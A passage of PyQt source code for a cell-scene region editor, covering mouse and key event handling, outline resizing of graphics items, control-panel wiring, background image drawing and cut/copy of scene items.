lItemScenePoint.x() - ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() - ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"topLeft\":\n lItemNewPosX = lItemScenePoint.x() + ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() - ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"bottomRight\":\n lItemNewPosX = lItemScenePoint.x() - ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() + ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"bottomLeft\":\n lItemNewPosX = lItemScenePoint.x() + ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() + ( (bHeightY - sy * bHeightY) * 0.5 )\n else:\n return\n\n # one has to be careful with setPos() because Qt does NOT provide a function\n # to set a QGraphicsItem's position in scene coordinates, only in *parent*\n # coordinates. So the following setPos() call would FAIL if we had hierarchies\n # of items. As from the Qt online documentation: \"setPos() sets the position of\n # the item to pos, which is in parent coordinates. For items with no parent,\n # pos is in scene coordinates.\"\n lItemScenePoint.setX ( lItemNewPosX )\n lItemScenePoint.setY ( lItemNewPosY )\n self.myOutlineResizingItem.setPos(lItemScenePoint)\n\n # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().x(), self.myOutlineResizingCurrentX, sx, self.myOutlineResizingItem.myScaleX =\", pMouseEvent.scenePos().x(), self.myOutlineResizingCurrentX, sx, self.myOutlineResizingItem.myScaleX )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().y(), self.myOutlineResizingCurrentY, sy, self.myOutlineResizingItem.myScaleY =\", pMouseEvent.scenePos().y(), self.myOutlineResizingCurrentY, sy, self.myOutlineResizingItem.myScaleY )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"self.myOutlineResizingItem.transformations() =\", self.myOutlineResizingItem.transformations() )+\" \", CDConstants.DebugTODO )\n\n elif self.mySceneMode == CDConstants.SceneModeInsertLine and self.line:\n newLine = QtCore.QLineF(self.line.line().p1(), pMouseEvent.scenePos())\n self.line.setLine(newLine)\n\n elif self.mySceneMode == CDConstants.SceneModeMoveItem:\n super(DiagramScene, self).mouseMoveEvent(pMouseEvent)\n # signal to update the moved item's x/y/w/h information display:\n lAllSelectedItems = self.selectedItems()\n # make sure that there is at least one selected item:\n if lAllSelectedItems:\n # get the first selected item:\n lFirstSelectedItem = lAllSelectedItems[0]\n lBoundingRect = lFirstSelectedItem.sceneBoundingRect()\n self.signalThatItemResized.emit(lBoundingRect)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - mouseReleaseEvent() modified to handle both\n # outline-resizing of items and right-button resizing of items,\n # and (2011) SceneModeImageLayer support as well...\n # ------------------------------------------------------------\n def mouseReleaseEvent(self, pMouseEvent):\n\n # 2010 - Mitja: respond to all release events to stop outline resizing of items:\n self.myOutlineResizingVertex = \"None\"\n # update the scene to affect redrawing of the selected item's outline\n self.update()\n\n # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n # event processing, and pass the event to theCDImageLayer's own\n # mousePressEvent handler:\n if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n if isinstance(self.theImageLayer, CDImageLayer) == True:\n self.theImageLayer.mouseReleaseEvent(pMouseEvent)\n\n # 2010 - Mitja: implement right-clicking on items, to resize them in real-time:\n elif self.myRightButtonResizingItem != None:\n self.myRightButtonResizingItem = None\n self.myRightButtonResizingClickX = -1.0\n self.myRightButtonResizingClickY = -1.0\n # CDConstants.printOut( \" \"+str( \"mouseReleaseEvent ELSE mouseReleaseEvent ELSE mouseReleaseEvent =\", pMouseEvent )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"myRightButtonResizingItem ELSE myRightButtonResizingItem ELSE myRightButtonResizingItem =\", self.myRightButtonResizingItem )+\" \", CDConstants.DebugTODO )\n # update the scene to remove the foreground outline:\n self.update()\n\n\n elif self.line and self.mySceneMode == CDConstants.SceneModeInsertLine:\n startItems = self.items(self.line.line().p1())\n if len(startItems) and startItems[0] == self.line:\n startItems.pop(0)\n endItems = self.items(self.line.line().p2())\n if len(endItems) and endItems[0] == self.line:\n endItems.pop(0)\n\n self.removeItem(self.line)\n self.line = None\n\n if len(startItems) and len(endItems) and \\\n isinstance(startItems[0], DiagramItem) and \\\n isinstance(endItems[0], DiagramItem) and \\\n startItems[0] != endItems[0]:\n startItem = startItems[0]\n endItem = endItems[0]\n arrow = Arrow(startItem, endItem)\n arrow.setColor(self.myLineColor)\n startItem.addArrow(arrow)\n endItem.addArrow(arrow)\n arrow.setZValue(-1000.0)\n self.addItem(arrow)\n arrow.updatePosition()\n\n self.line = None\n\n #\n # 2010 - Mitja: update the scene's rectangle manually, so that it expands with all the scene elements:\n #\n # lNewSceneRect = self.itemsBoundingRect()\n # if lNewSceneRect.isNull():\n # # if there are no elements, make the scene at least as large as the background image:\n # self.setSceneRect(self.theImageFromFile.rect())\n # else:\n # # make the scene large enough to include both the elements as well as the background image dimensions:\n # self.setSceneRect(lNewSceneRect.united(self.theImageFromFile.rect()))\n #\n # does not seem to work properly.... the scene resizes in a weird way!?!\n #\n\n super(DiagramScene, self).mouseReleaseEvent(pMouseEvent)\n\n\n\n\n # ------------------------------------------------------------\n # 2012 - Mitja - keyReleaseEvent() added to handle pressing the key\n # and passing it to theImageLayer when in SceneModeImageLayer mode.\n # ------------------------------------------------------------\n def keyReleaseEvent(self, pMouseEvent):\n\n # 2012 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n # event processing, and pass the event to theCDImageLayer's own\n # keyReleaseEvent handler:\n if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n if isinstance(self.theImageLayer, CDImageLayer) == True:\n self.theImageLayer.keyReleaseEvent(pMouseEvent)\n\n super(DiagramScene, self).keyReleaseEvent(pMouseEvent)\n\n\n\n\n # ------------------------------------------------------------\n def isItemChange(self, type):\n for item in self.selectedItems():\n if isinstance(item, type):\n return True\n return False\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: reset variables for resizing an item by using an outline:\n def stopOutlineResizing(self):\n self.myOutlineResizingItem = None\n # myOutlineResizingVertex can be: \"None\", \"bottomLeft\", \"bottomRight\", \"topRight\", \"topLeft\":\n self.myOutlineResizingVertex = \"None\"\n self.myOutlineResizingCurrentX = -1.0\n self.myOutlineResizingCurrentY = -1.0\n self.update()\n \n \n\n # ------------------------------------------------------------\n # check if any of the vertices in the item's bounding rectangle is close to the mouse position,\n # and if so return its value - the input parameters are the item and the mouse's scene pos:\n # ------------------------------------------------------------\n def isCloseToOutlineVertex(self, pMyOutlineResizingItem, pMousePosInScene):\n lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n if self.vvIsCloseDistance(lBoundingRect.bottomLeft(), pMousePosInScene):\n # CDConstants.printOut( \" \"+str( \"bottomLeft\" )+\" \", CDConstants.DebugTODO )\n return \"bottomLeft\"\n elif self.vvIsCloseDistance(lBoundingRect.bottomRight(), pMousePosInScene):\n # CDConstants.printOut( \" \"+str( \"bottomRight\" )+\" \", CDConstants.DebugTODO )\n return \"bottomRight\"\n elif self.vvIsCloseDistance(lBoundingRect.topRight(), pMousePosInScene):\n # CDConstants.printOut( \" \"+str( \"topRight\" )+\" \", CDConstants.DebugTODO )\n return \"topRight\"\n elif self.vvIsCloseDistance(lBoundingRect.topLeft(), pMousePosInScene):\n # CDConstants.printOut( \" \"+str( \"topLeft\" )+\" \", CDConstants.DebugTODO )\n return \"topLeft\"\n else:\n # CDConstants.printOut( \" \"+str( \"None\" )+\" \", CDConstants.DebugTODO )\n return \"None\"\n\n # ------------------------------------------------------------\n # provide vertex-to-vertex distance calculation:\n # ------------------------------------------------------------\n def vvIsCloseDistance(self, pV1, pV2):\n x1 = pV1.x()\n y1 = pV1.y()\n x2 = pV2.x()\n y2 = pV2.y()\n # CDConstants.printOut( \" \"+str( \"x1, y1, x2, y2, dist = \", x1, y1, x2, y2, math.sqrt( (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) ) )+\" \", CDConstants.DebugTODO )\n if math.sqrt( (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) ) < 6.0:\n return True\n else:\n return False\n\n\n\n\n\n# ------------------------------------------------------------\n# 2010 - Mitja - move from a QMainWindow class to a QWidget panel-type class\n# ------------------------------------------------------------\n# note: this class emits a signal: \"signalVisibilityPIFRegionTable\"\n# ------------------------------------------------------------\n# class DiagramSceneMainWindow(QtGui.QMainWindow):\nclass CDDiagramSceneMainWidget(QtGui.QWidget):\n\n mysignal = QtCore.pyqtSignal(str)\n\n signalVisibilityPIFRegionTable = QtCore.pyqtSignal(str)\n\n InsertTextButton = 10\n\n # 2010 - Mitja - since this class is not a QMainWindow class anymore,\n # we need to be able to access our \"parent\" class (a QMainWindow!)\n # to place menus and toolbars onto it.\n def __init__(self, pParentWindow = None):\n super(CDDiagramSceneMainWidget, self).__init__(pParentWindow)\n\n self.parentWindow = pParentWindow\n\n\n if self.parentWindow == None:\n # -> this is now called diagramSceneCreateActions() in ControllerMainWindow:\n # self.createActions()\n pass\n else:\n self.createSceneEditActions()\n\n # 2010 - Mitja: is there any real need for menus,\n # when all actions are reachable from toolbars?\n self.createMenus()\n \n\n # 2011 - Mitja: create the QGraphicsScene as main PIFF editing place:\n self.scene = DiagramScene(self.editMenu, self)\n # add a file associated to the scene:\n self.curFile = ''\n # 2010 - Mitja:\n # self.scene.setSceneRect(QtCore.QRectF(0, 0, 5000, 5000))\n self.scene.setSceneRect(QtCore.QRectF(0, 0, 240, 180))\n\n\n # -------------------------------------------------------------------\n\n # 2011 - Mitja: create a Control Panel with buttons & sliders:\n #\n # panel for PIFF parameters, with the CDDiagramSceneMainWidget as its parent\n # (that's why we pass \"self\" as parameter to the dialog panel) :\n self.windowPIFControlPanel = CDControlPanel(self)\n\n # 2011 - Mitja: we now place all toolbox items inside the main Control Panel.\n\n # -----------------------------------\n\n # 2011 - Mitja: to control the \"layer selection\" for Cell Scene mode,\n # we add a set of radio-buttons to the Control Panel:\n\n self.theControlsForLayerSelection = CDControlLayerSelection()\n\n # explicitly connect the \"signalLayersSelectionModeHasChanged()\"\n # signal from the theControlsForLayerSelection object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForLayerSelection.signalLayersSelectionModeHasChanged.connect( \\\n self.handleLayersSelectionModeHasChanged )\n\n # place the layer selection buttons in the control panel:\n self.windowPIFControlPanel.setControlsForLayerSelection( \\\n self.theControlsForLayerSelection)\n\n # -----------------------------------\n\n # 2011 - Mitja: to control Cell Scene \"scale/zoom\" factor,\n # we add a combobox (pop-up menu) to the Control Panel:\n\n self.theSceneScaleZoomControl = CDControlSceneScaleZoom()\n\n # explicitly connect the \"signalScaleZoomHasChanged()\"\n # signal from the theSceneScaleZoomControl object,\n # to our \"slot\" method responding to radio button changes:\n self.theSceneScaleZoomControl.signalScaleZoomHasChanged.connect( \\\n self.handleSceneScaleZoomChanged )\n\n # place the layer selection buttons in the control panel:\n self.windowPIFControlPanel.setControlsForSceneScaleZoom( \\\n self.theSceneScaleZoomControl)\n\n # -----------------------------------\n\n # 2011 - Mitja: to control the \"drawing toggle\" for regions vs. cells,\n # we add radio-buttons to the Control Panel:\n\n self.theToggleforRegionOrCellDrawing = CDControlRegionOrCell()\n\n # explicitly connect the \"signalSetRegionOrCell()\" signal from the\n # theToggleforRegionOrCellDrawing object, to our \"slot\" method\n # so that it will respond to any change in radio button choices:\n\n answer = self.theToggleforRegionOrCellDrawing.signalSetRegionOrCell.connect( \\\n self.handleToggleRegionOrCellDrawingChanged)\n\n # place the drawing toggle GUI in the control panel:\n self.windowPIFControlPanel.setControlsForDrawingRegionOrCellToggle( \\\n self.theToggleforRegionOrCellDrawing)\n\n # -----------------------------------\n\n # Here we provide a logical button group for Region Shapes button widgets\n # that are going to be placed inside the main Control Panel:\n self.theButtonGroupForRegionShapes = self.createButtonGroupForRegionShapes()\n # Here we provide a logical button group for Background button widgets\n # that are going to be placed inside the main Control Panel:\n self.theButtonGroupForBackgrounds = self.createButtonGroupForBackgrounds()\n\n self.windowPIFControlPanel.setButtonGroupForRegionShapes( \\\n self.theButtonGroupForRegionShapes )\n\n self.windowPIFControlPanel.setButtonGroupForBackgrounds( \\\n self.theButtonGroupForBackgrounds )\n\n # create four icons for the basic four region DiagramItem buttons:\n lItem = DiagramItem(DiagramItem.RectangleConst, self.editMenu)\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon() )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.RectangleConst, lIcon)\n\n lItem = DiagramItem(DiagramItem.TenByTenBoxConst, self.editMenu)\n # u\"\\u00D7\" # <-- the multiplication sign as unicode\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon(\"10\" + u\"\\u00D7\" + \"10\") )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.TenByTenBoxConst, lIcon)\n\n lItem = DiagramItem(DiagramItem.TwoByTwoBoxConst, self.editMenu)\n # u\"\\u00D7\" # <-- the multiplication sign as unicode\n lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon(\"2 \" + u\"\\u00D7\" + \" 2\") )\n self.windowPIFControlPanel.setWidgetIcon(DiagramItem.TwoByTwoBoxConst, lIcon)\n\n\n # the \"PathConst\" is not there since it's generated by CDControlPanel internally:\n # lItem = DiagramItem(DiagramItem.PathConst, self.editMenu)\n # lIcon = QtGui.QIcon( lItem.pixmapForIconFromPolygon() )\n # self.windowPIFControlPanel.setWidgetIcon(DiagramItem.PathConst, lIcon)\n lItem = 0\n\n # -----------------------------------\n\n # 2010 - Mitja: add code for new backgrounds:\n lBoringPixMap = QtGui.QPixmap(240, 180)\n lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.white) )\n self.theImageFromFile = QtGui.QImage(lBoringPixMap)\n self.theImageNameFromFile = \"BlankBackground\"\n\n # -----------------------------------\n\n # 2011 - Mitja: to control the \"picking mode\" for the input image,\n # we add a set of radio-buttons and a slider to the Control Panel:\n\n self.theControlsForInputImagePicking = CDControlInputImage()\n # explicitly connect the \"inputImagePickingModeChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in radio button choices:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"inputImagePickingModeChangedSignal()\"), \\\n self.handleInputImagePickingModeChanged )\n # explicitly connect the \"inputImageOpacityChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"inputImageOpacityChangedSignal()\"), \\\n self.handleImageOpacityChanged )\n # explicitly connect the \"fuzzyPickTresholdChangedSignal()\" signal from the\n # theControlsForInputImagePicking object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n answer = self.connect(self.theControlsForInputImagePicking, \\\n QtCore.SIGNAL(\"fuzzyPickTresholdChangedSignal()\"), \\\n self.handleFuzzyPickThresholdChanged )\n\n # explicitly connect the \"signalImageScaleZoomHasChanged()\"\n # signal from the theControlsForInputImagePicking object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForInputImagePicking.signalImageScaleZoomHasChanged.connect( \\\n self.handleImageScaleZoomChanged )\n\n\n # 2011 - Mitja: since the self.theControlsForInputImagePicking widget is used\n # to control QGraphicsScene's theCDImageLayer's behavior, it's initially not enabled:\n self.theControlsForInputImagePicking.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForInputImagePicking( \\\n self.theControlsForInputImagePicking)\n\n\n\n\n # -----------------------------------\n\n # 2011 - Mitja: to access the \"image sequence\",\n # we add a set of buttons and sliders to the Control Panel:\n\n self.theControlsForImageSequence = CDControlImageSequence()\n\n # explicitly connect the \"signalSelectedImageInSequenceHasChanged()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method\n # so that it will respond to any change in slider values:\n self.theControlsForImageSequence.signalSelectedImageInSequenceHasChanged.connect( \\\n self.handleSelectedImageWithinSequenceChanged )\n\n\n # explicitly connect the \"signalImageSequenceProcessingModeHasChanged()\"\n # signal from the theControlsForImageSequence object,\n # to our \"slot\" method responding to radio button changes:\n self.theControlsForImageSequence.signalImageSequenceProcessingModeHasChanged.connect( \\\n self.handleAreaOrEdgeModeHasChanged )\n\n\n # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method:\n\n answer = self.theControlsForImageSequence.signalSetCurrentTypeColor.connect( \\\n self.handleTypesColorEvent)\n\n # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n # theControlsForImageSequence object, to our \"slot\" method:\n answer = self.theControlsForImageSequence.signalForPIFFTableToggle.connect( \\\n self.handlePIFRegionTableButton)\n\n\n # 2011 - Mitja: since the self.theControlsForImageSequence widget is used\n # to control an Image Sequence, it's initially not enabled:\n self.theControlsForImageSequence.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForImageSequence( \\\n self.theControlsForImageSequence)\n\n\n\n\n\n\n\n\n\n\n # -----------------------------------\n\n # 2011 - Mitja: to access the \"image sequence\",\n # we add a set of buttons and sliders to the Control Panel:\n\n self.theControlsForClusters = CDControlClusters()\n# \n# # explicitly connect the \"signalSelectedImageInSequenceHasChanged()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method\n# # so that it will respond to any change in slider values:\n# self.theControlsForClusters.signalSelectedImageInSequenceHasChanged.connect( \\\n# self.handleSelectedImageWithinSequenceChanged )\n# \n# \n# # explicitly connect the \"signalImageSequenceProcessingModeHasChanged()\"\n# # signal from the theControlsForClusters object,\n# # to our \"slot\" method responding to radio button changes:\n# self.theControlsForClusters.signalImageSequenceProcessingModeHasChanged.connect( \\\n# self.handleAreaOrEdgeModeHasChanged )\n# \n# # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method:\n# \n# answer = self.theControlsForClusters.signalSetCurrentTypeColor.connect( \\\n# self.handleTypesColorEvent)\n# \n# # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n# # theControlsForClusters object, to our \"slot\" method:\n# answer = self.theControlsForClusters.signalForPIFFTableToggle.connect( \\\n# self.handlePIFRegionTableButton)\n# \n# \n# # 2011 - Mitja: since the self.theControlsForClusters widget is used\n# # to control an Image Sequence, it's initially not enabled:\n# self.theControlsForClusters.setEnabled(False)\n \n self.windowPIFControlPanel.setControlsForClusters( \\\n self.theControlsForClusters)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Scene Item Edit\" controls,\n # containing basic scene editing actions:\n #\n self.theControlsForSceneItemEdit = PIFControlSceneItemEdit()\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.cutAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.copyAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.pasteAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.deleteAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.toFrontAction)\n self.theControlsForSceneItemEdit.addActionToControlsForSceneItemEdit(self.sendBackAction)\n self.theControlsForSceneItemEdit.populateControlsForSceneItemEdit()\n\n self.windowPIFControlPanel.setControlsForSceneItemEdit( \\\n self.theControlsForSceneItemEdit)\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: controls for setting types of regions and cells:\n #\n self.theControlsForTypes = CDControlTypes()\n\n # explicitly connect the \"signalSetCurrentTypeColor()\" signal from the\n # theControlsForTypes object, to our \"slot\" method:\n\n answer = self.theControlsForTypes.signalSetCurrentTypeColor.connect( \\\n self.handleTypesColorEvent)\n\n # explicitly connect the \"signalForPIFFTableToggle()\" signal from the\n # theControlsForTypes object, to our \"slot\" method:\n answer = self.theControlsForTypes.signalForPIFFTableToggle.connect( \\\n self.handlePIFRegionTableButton)\n\n # add the Table of Types window show/hide toggle action to the windowMenu in the main menu bar:\n self.theControlsForTypes.setMenuForTableAction(self.windowMenu)\n\n self.windowPIFControlPanel.setControlsForTypes( self.theControlsForTypes)\n \n\n # ------------------------------------------------------------\n\n # populate the PIFF control panel toolbar with its content, i.e.\n # now that we passed all the required data, generate the Control Panel GUI:\n self.windowPIFControlPanel.populateControlPanel()\n\n # and finally show the PIFF control panel:\n self.windowPIFControlPanel.show()\n\n # ----------------------\n\n # self.createToolbars()\n\n self.setLayout(QtGui.QHBoxLayout())\n self.layout().setMargin(2)\n self.layout().setAlignment(QtCore.Qt.AlignCenter)\n\n self.view = QtGui.QGraphicsView(self.scene)\n # our QGraphicsView will not accept partial viewport updates:\n self.view.setViewportUpdateMode(QtGui.QGraphicsView.FullViewportUpdate) \n # when the view is resized, the view leaves the scene's *position* unchanged\n self.view.setResizeAnchor(QtGui.QGraphicsView.NoAnchor)\n # when the whole scene is visible in the view, where is it aligned?\n self.view.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignVCenter)\n\n # take care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QGraphicsView's affine transformations:\n self.view.scale(1.0, -1.0)\n\n self.layout().addWidget(self.view)\n \n # 2011 - Mitja: add a separate image layer object\n # to paint piff input images on the top of the QGraphicsScene:\n self.theCDImageLayer = CDImageLayer(self)\n self.scene.setImageLayer(self.theCDImageLayer)\n\n\n # 2011 - Mitja: add a separate object to handle a sequence of images:\n self.theCDImageSequence = CDImageSequence(self)\n self.scene.setImageSequence(self.theCDImageSequence)\n\n\n self.connectSignals()\n\n self.setWindowTitle(\"Cell Scene Region Editor\")\n self.show()\n\n\n\n # ------------------------------------------------------------------\n # 2011 - Mitja: assign CellDraw preferences object:\n # ------------------------------------------------------------------\n def setPreferencesObject(self, pCDPreferences=None):\n self.cdPreferences = pCDPreferences\n CDConstants.printOut( \">>>>>>>>>>>>>>>>>>>>>>>> CDDiagramSceneMainWidget.cdPreferences is now =\" + str(self.cdPreferences), CDConstants.DebugVerbose )\n\n\n # ------------------------------------------------------------\n def handlerForButtonGroupBackgroundsClicked(self, pButton):\n theBgButtons = self.theButtonGroupForBackgrounds.buttons()\n for myButton in theBgButtons:\n if myButton != pButton:\n myButton.setChecked(False)\n # CDConstants.printOut( \" \"+str( \"handlerForButtonGroupBackgroundsClicked() myButton =\",myButton,\\ )+\" \", CDConstants.DebugTODO )\n # \" isChecked() =\", myButton.isChecked()\n\n text = pButton.text()\n\n self.updateSceneBackgroundImage(text)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - separated updateSceneBackgroundImage() from\n # handlerForButtonGroupBackgroundsClicked(), so that the following functionality is reachable\n # also when there is no toolbox click, but a change either in the scene dimensions\n # or in the background image source itself.\n # ------------------------------------------------------------\n def updateSceneBackgroundImage(self, pText):\n # ------------------------------------------------------------\n # create a pixmap that's as least as wide/tall as the current scene,\n # and at least as wide as to fit the background image's size, positioned at 0,0,\n # and at least 2000x2000 in size not to have tiling of the background image:\n lTempLargestQPixmapRect = QtCore.QRect(0, 0, 2000, 2000)\n lBackgroundRect = QtCore.QRectF( \\\n self.scene.sceneRect().united( \\\n QtCore.QRectF(self.theImageFromFile.rect().united(lTempLargestQPixmapRect) ) \\\n ) \\\n )\n lPixmap = QtGui.QPixmap(lBackgroundRect.width(), lBackgroundRect.height())\n # lPixmap.fill( QtGui.QPalette.color(QtGui.QPalette(), QtGui.QPalette.Base) )\n lPixmap.fill( QtGui.QColor(QtCore.Qt.gray) )\n lPainter = QtGui.QPainter(lPixmap)\n\n # create another pixmap of the same size as the graphics scene rectangle, and fill it with the chosen background pattern:\n lTmpPixmap = QtGui.QPixmap( self.scene.width(), self.scene.height() )\n lTmpPixmap.fill( QtGui.QColor(QtCore.Qt.white) )\n lTmpPainter = QtGui.QPainter(lTmpPixmap)\n\n if pText == \"Blue Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background1.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background1.png')))\n elif pText == \"White Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background2.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background2.png')))\n elif pText == \"Gray Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background3.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background3.png')))\n elif pText == \"No Grid\":\n lTmpPainter.fillRect( self.scene.sceneRect(), QtGui.QBrush(QtGui.QPixmap(':/icons/background4.png')) )\n # self.scene.setBackgroundBrush(QtGui.QBrush(QtGui.QPixmap(':/icons/background4.png')))\n # 2010 - Mitja: add code for new backgrounds:\n else:\n # lPixmap.fill( QtGui.QPalette.color(QtGui.QPalette(), QtGui.QPalette.Base) )\n # lPainter.drawImage(QtCore.QPoint(0,0), self.theImageFromFile)\n\n # immediately transform the starting/loaded QImage: invert Y values, from RHS to LHS:\n lWidth = self.theImageFromFile.width()\n lHeight = self.theImageFromFile.height()\n\n # take care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QPainter's affine transformations: \n lTmpPainter.translate(0.0, float(lHeight))\n lTmpPainter.scale(1.0, -1.0)\n \n # access the QLabel's pixmap to draw it explicitly, using QPainter's scaling:\n lTmpPainter.drawImage(QtCore.QPoint(0,0), self.theImageFromFile)\n\n lTmpPainter.end()\n lPainter.drawPixmap(QtCore.QPoint(0,0), lTmpPixmap)\n lPainter.end()\n\n # 2010 - Mitja: update the background image from file:\n # self.theImageFromFile = QtGui.QImage(lPixmap)\n # 2010 - Mitja: if we wanted to update the scene size to fit to the background image, we'd do this:\n # self.scene.setSceneRect(lBackgroundRect)\n\n self.scene.setBackgroundBrush(QtGui.QBrush(lPixmap))\n\n self.scene.update()\n self.view.update()\n # CDConstants.printOut( \" \"+str( \"___ - DEBUG ----- CDDiagramSceneMainWidget: updateSceneBackgroundImage() lBackgroundRect =\", lBackgroundRect, \"done.\" )+\" \", CDConstants.DebugTODO )\n # end of def updateSceneBackgroundImage(self, pText)\n # ------------------------------------------------------------\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add code for new items being either a cell or a region:\n # ------------------------------------------------------------\n def handlerForButtonGroupRegionShapesClicked(self, id):\n buttons = self.theButtonGroupForRegionShapes.buttons()\n for button in buttons:\n if self.theButtonGroupForRegionShapes.button(id) != button:\n button.setChecked(False)\n\n if id == self.InsertTextButton:\n self.scene.setMode(CDConstants.SceneModeInsertText)\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n else:\n self.scene.setItemType(id)\n self.scene.setMode(CDConstants.SceneModeInsertItem)\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for toggling on/off the Table of Types Window:\n # ------------------------------------------------------------\n def handlePIFRegionTableButton(self, pString):\n # propagate the signal upstream, for example to parent objects:\n self.signalVisibilityPIFRegionTable.emit(pString)\n# CDConstants.printOut( \" \"+str( \"handlePIFRegionTableButton\" )+\" \", CDConstants.DebugTODO )\n # TODO add show/hide of table when there are no rows\n # TODO add showing rows in the table when a new region is added\n# CDConstants.printOut( \" \"+str( \"handlePIFRegionTableButton\" )+\" \", CDConstants.DebugTODO )\n pass\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for cut/copy/paste of scene items:\n # ------------------------------------------------------------\n def cutItem(self):\n # pass a True parameter to copyItem(), signalling that we\n # are about to delete the original, so copyItem() knows\n # that the call has originated from a cutItem():\n self.copyItem(True)\n self.deleteItem()\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for cut/copy/paste of scene items:\n # ------------------------------------------------------------\n def copyItem(self, pItemHasBeenCut = False):\n # the optional pItemHasBeenCut parameter is to be set to True\n # if the call has originated from a cutItem(), i.e. the original\n # item has now been deleted, so we keep its scene position unmodified.\n # Otherwise (for copy-paste) it'll be shifted slightly, so that the user\n # will see that it's a pasted item.\n\n lAllSelectedItems = self.scene.selectedItems()\n # make sure that there is at least one selected item:\n if not lAllSelectedItems:\n # CDConstants.printOut( \" \"+str( \"#=#=#=#=#=#=#=# copyItem() lAllSelectedItems =\", lAllSelectedItems )+\" \", CDConstants.DebugTODO )\n return\n\n # we copy the first selected item:\n lFirstSelectedItem = lAllSelectedItems[0]\n \n # get all the necessary information from the item:\n lSelectedItemPosition = lFirstSelectedItem.scenePos()\n lSelectedItemHasBeenCut = pItemHasBeenCut\n lSelectedItemColor = lFirstSelectedItem.brush().color()\n lSelectedItemRegionOrCell = lFirstSelectedItem.itsaRegionOrCell\n lSelectedItemType = lFirstSelectedItem.diagramType\n lSelectedItemScaleX = lFirstSelectedItem.myScaleX\n lSelectedItemScaleY = lFirstSelectedItem.myScaleY\n lSelectedItemPolygon = lFirstSelectedItem.polygon()\n\n lPointListX = [] \n lPointListY = [] \n for lPointF in lSelectedItemPolygon:\n # CDConstants.printOut( \" \"+str( \"lPointF = \", lPointF )+\" \", CDConstants.DebugTODO )\n lPointListX.append(lPointF.x())\n lPointListY.append(lPointF.y())\n\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemPosition =\", lSelectedItemPosition 